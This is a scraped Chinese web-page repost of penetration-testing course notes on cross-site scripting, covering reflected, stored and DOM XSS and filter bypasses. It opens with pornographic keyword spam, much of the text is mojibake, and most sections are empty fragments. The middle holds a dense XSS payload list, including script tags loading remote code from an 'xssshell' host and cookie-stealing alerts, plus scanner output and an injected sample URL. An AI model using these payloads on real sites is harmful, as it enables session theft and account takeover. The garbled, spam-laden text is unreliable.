日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

Web渗透测试-Xss跨站脚本攻击(Cross Site Scripting)

發(fā)布時(shí)間:2023/12/31 编程问答 48 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Web渗透测试-Xss跨站脚本攻击(Cross Site Scripting) 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

Xss跨站腳本攻擊

    • Xss通用明文 &&表單劫持
      • 跨站腳本攻擊漏洞概念,
      • 漏洞原理和危害,
      • 掌握反射型、存儲(chǔ)型XSS漏洞利用方法
    • web安全工程師-03-XSS漏洞原理與利用
  • 第一章:XSS基礎(chǔ)
    • 1.1 XSS介紹與原理~1
    • 1.2 存儲(chǔ)型XSS實(shí)戰(zhàn)
    • 1.3 反射型XSS實(shí)戰(zhàn)
    • 1.4 DOM型XSS實(shí)戰(zhàn)
    • 1.5 XSS輔助測(cè)試工具
  • 第二章: XSS實(shí)戰(zhàn)與防御機(jī)制繞過(guò)
    • 2.1 存儲(chǔ)型XSS多場(chǎng)景實(shí)戰(zhàn)及Bypass詳解
    • 2.3 反射型XSS多場(chǎng)景實(shí)戰(zhàn)及Bypass詳解~1
      • payload 多次 url 編碼
    • 2.4 DOM型XSS多場(chǎng)景實(shí)戰(zhàn)及Bypass詳解~1
  • 第三章:XSS高級(jí)

淺談XSS漏洞挖掘 https://mp.weixin.qq.com/s/6oT63IxXodWte3WLw-zKRw有輸入的地方就試試,對(duì)可以觸發(fā)XSS的地方做總結(jié)輸入即輸出 對(duì)用戶的輸入在沒(méi)有進(jìn)行任何過(guò)濾的情況下進(jìn)行了輸出。 輸出報(bào)錯(cuò)信息的時(shí)候直接把用戶輸入的內(nèi)容直接進(jìn)行了輸出。 猜想可能由于現(xiàn)在對(duì)信息安全的重視,涉及到業(yè)務(wù)方面的輸入數(shù)據(jù)的過(guò)濾編碼已經(jīng)很成熟, 對(duì)一些錯(cuò)誤信息的輸出可能重視還不夠大。該漏洞的觸發(fā)就是在返回錯(cuò)誤信息的時(shí)候回返回方法名,這個(gè)方法名攻擊者可以自己定義,導(dǎo)致觸發(fā)了XSS漏洞 在返回錯(cuò)誤信息的時(shí)候回返回參數(shù)FUZZ參數(shù)觸發(fā)XSS XSS(跨站腳本)概述 Cross-Site Scripting 簡(jiǎn)稱為“CSS”, 為避免與前端疊成樣式表的縮寫(xiě)"CSS"沖突,故又稱XSS。 一般XSS可以分為如下幾種常見(jiàn)類型:1.反射性XSS;2.存儲(chǔ)型XSS; 3.DOM型XSS;XSS漏洞一直被評(píng)估為web漏洞中危害較大的漏洞, 在OWASP TOP10的排名中一直屬于前三的江湖地位。XSS是一種發(fā)生在前端瀏覽器端的漏洞,所以其危害的對(duì)象也是前端用戶。形成XSS漏洞的主要原因是程序?qū)斎牒洼敵鰶](méi)有做合適的處理, 導(dǎo)致“精心構(gòu)造”的字符輸出在前端時(shí)被瀏覽器當(dāng)作有效代碼解析執(zhí)行從而產(chǎn)生危害。因此在XSS漏洞的防范上, 一般會(huì)采用“對(duì)輸入進(jìn)行過(guò)濾”和“輸出進(jìn)行轉(zhuǎn)義”的方式進(jìn)行處理: 輸入過(guò)濾:對(duì)輸入進(jìn)行過(guò)濾,不允許可能導(dǎo)致XSS攻擊的字符輸入; 輸出轉(zhuǎn)義:根據(jù)輸出點(diǎn)的位置對(duì)輸出到前端的內(nèi)容進(jìn)行適當(dāng)轉(zhuǎn)義;"'><textarea+autofocus+onfocus=alert(45)><iframe/src=JavaScriPt:alert(45)><script>alert(aming)</script><script src=”http://192.168.1.19/xssshell.jsp?v=336699″></script> ><script>alert(document.cookie)</script> =’><script>alert(document.cookie)</script> <script>alert(document.cookie)</script> <script>alert(vulnerable)</script> <script>alert(‘XSS’)</script> <img src=”javascript:alert(‘XSS’)”> <script>alert(‘Vulnerable’)</script> <IFRAME SRC=javascript:alert(‘XSS’)></IFRAME> <BODY BACKGROUND=”javascript:alert(‘XSS’)”> <BODY ONLOAD=alert(‘XSS’)> <IMG DYNSRC=”javascript:alert(‘XSS’)”> <IMG LOWSRC=”javascript:alert(‘XSS’)”> <TABLE BACKGROUND=”javascript:alert(‘XSS’)”> <SCRIPT a=”>” SRC=”http://xxxx/a.js”></SCRIPT> <SCRIPT =”>” SRC=”http://xxxxx/a.js”></SCRIPT> <SCRIPT a=”>” ” SRC=”http://xxxxx/a.js”></SCRIPT> <SCRIPT “a=’>’” SRC=”http://xxxxx/a.js”></SCRIPT><img src=x onerror=alert(45)> <svg/onload=alert(45)> <script>alert(45)</script> <img/src onerror=alert(45)> "><iframe/src=JavaScriPt:alert(45)> <video/poster/onerror=alert(45)> <audio src onloadstart=alert(45)> <meter onmouseover=alert(45)>0</meter> <marquee onstart=alert(45)> <select autofocus onfocus=alert(45)> <input autofocus onfocus=alert(45)> <keygen autofocus onfocus=alert(45)> <textarea autofocus onfocus=alert(45)><original query> onhwul=64 <svg/onload=alert(45)> | reflected XSS Code | <script>alert(45)</script> | reflected XSS Code | | 9 | HIGH | XSS | GET | type | <marquee onstart=alert(45)> | reflected HTML5 XSS Code | | 10 | HIGH | XSS | GET | type | <meter onmouseover=alert(45)>0</meter> | reflected HTML5 XSS Code | | 11 | HIGH | XSS | GET | type | <audio src onloadstart=alert(45)> | reflected HTML5 XSS Code | | 12 | HIGH | XSS | GET | type | "><iframe/src=JavaScriPt:alert(45)> | reflected XSS Code | | 13 | HIGH | XSS | GET | type | <video/poster/onerror=alert(45)> | reflected HTML5 XSS Code | | 14 | HIGH | XSS | GET | type | <img/src onerror=alert(45)> | reflected XSS Code | | 15 | HIGH | XSS | GET | type | <input autofocus onfocus=alert(45)> | reflected onfocus XSS Code | | 16 | HIGH | XSS | GET | type | <keygen autofocus onfocus=alert(45)> | reflected onfocus XSS Code | | 17 | HIGH | XSS | GET | type | <select autofocus onfocus=alert(45)> | reflected onfocus XSS Code | <textarea autofocus onfocus=alert(45)> | reflected onfocus XSS Code |http://www.xxxx.com/tool/search.php? title=88952634 &mod=main &file=html &action=index"'><textarea+autofocus+onfocus=alert(45)> &dosubmit=1

Xss通用明文 &&表單劫持




  • 跨站腳本攻擊漏洞概念,

  • 漏洞原理和危害,

  • 掌握反射型、存儲(chǔ)型XSS漏洞利用方法





















web安全工程師-03-XSS漏洞原理與利用

第一章:XSS基礎(chǔ)

1.1 XSS介紹與原理~1



打cookie xss + csrf getshell

用來(lái)攻擊 使用瀏覽器 打開(kāi)這個(gè) 頁(yè)面的 用戶 獲取cookie 正常用戶/管理員 權(quán)限

反射型 - 非存儲(chǔ)型 通常 xss 代碼 Payload (js) 通過(guò) get 某個(gè)參數(shù) 傳入 后端 沒(méi)有經(jīng)過(guò) 存儲(chǔ) 直接反射回 用戶頁(yè)面 (html)上

存儲(chǔ)型payload 存 在某一介質(zhì) (數(shù)據(jù)庫(kù)、緩存、文件)用戶 查看這個(gè)頁(yè)面時(shí) 展示 頁(yè)面 取出數(shù)據(jù) 時(shí) 執(zhí)行

跟反射型類似但接受者 不再是 后端程序 而是 js 拿到參數(shù) 直接 在頁(yè)面 顯示

html 實(shí)體編碼 大多數(shù) 管用白名單 發(fā)表文章 富文本 過(guò)濾掉 js代碼 或者 涉及非法的屬性只div a p b 標(biāo)簽 排除onError、onLoad 事件屬性 只 src 黑名單 可能會(huì)繞過(guò)xss 業(yè)務(wù)場(chǎng)景 對(duì)癥 反射 get 輸入 script代碼塊 輸出

xss 流程 payload 構(gòu)造 驗(yàn)證 修復(fù) xss 高階 新用法 xss持久化 xss系列

1.2 存儲(chǔ)型XSS實(shí)戰(zhàn)






















被實(shí)體轉(zhuǎn)義





我日我自己




用戶登錄 憑證

換個(gè)用戶登錄


盜取cookie

怎么修復(fù)















看 數(shù)據(jù)庫(kù) 中 可控字段

1.3 反射型XSS實(shí)戰(zhàn)


通過(guò) url 參數(shù) 傳入 惡意代碼






value 閉合 掉




反射型 修復(fù)


orm 模型 查詢










剛才 訪問(wèn)頁(yè)面 自動(dòng)給 焦點(diǎn) 就會(huì)一直觸發(fā)

語(yǔ)法
閉合
或者 屬性 彈窗



html 實(shí)體轉(zhuǎn)義掉



1.4 DOM型XSS實(shí)戰(zhàn)



js 實(shí)現(xiàn)






dom型 不一定 是 url 傳過(guò)來(lái)的 參數(shù)








1.5 XSS輔助測(cè)試工具




















繞過(guò)





















第二章: XSS實(shí)戰(zhàn)與防御機(jī)制繞過(guò)

2.1 存儲(chǔ)型XSS多場(chǎng)景實(shí)戰(zhàn)及Bypass詳解


















  • 全局 配置文件
















去掉空格 截?cái)嗪瘮?shù)



反斜杠 處理

處理 編碼問(wèn)題





數(shù)據(jù)展示 的 類



實(shí)體轉(zhuǎn)義 標(biāo)簽 防止 執(zhí)行

























輸入 沒(méi)做處理

輸出 做了處理 沒(méi)做完全

  • 修復(fù) 實(shí)體轉(zhuǎn)義



















編寫(xiě) payload





長(zhǎng)度限制 添加注釋


注釋 閉合 網(wǎng)頁(yè)標(biāo)簽







dom節(jié)點(diǎn)








多段提交
注釋 執(zhí)行

多點(diǎn)限制 加密 編碼
取值 得值 謹(jǐn)慎

2.3 反射型XSS多場(chǎng)景實(shí)戰(zhàn)及Bypass詳解~1

  • 插件 漏洞













payload 多次 url 編碼




瀏覽器默認(rèn) 解碼一次 url編碼



















2.4 DOM型XSS多場(chǎng)景實(shí)戰(zhàn)及Bypass詳解~1
































存儲(chǔ) + DOM











漏洞 分析 + 挖掘

第三章:XSS高級(jí)

總結(jié)

以上是生活随笔為你收集整理的Web渗透测试-Xss跨站脚本攻击(Cross Site Scripting)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。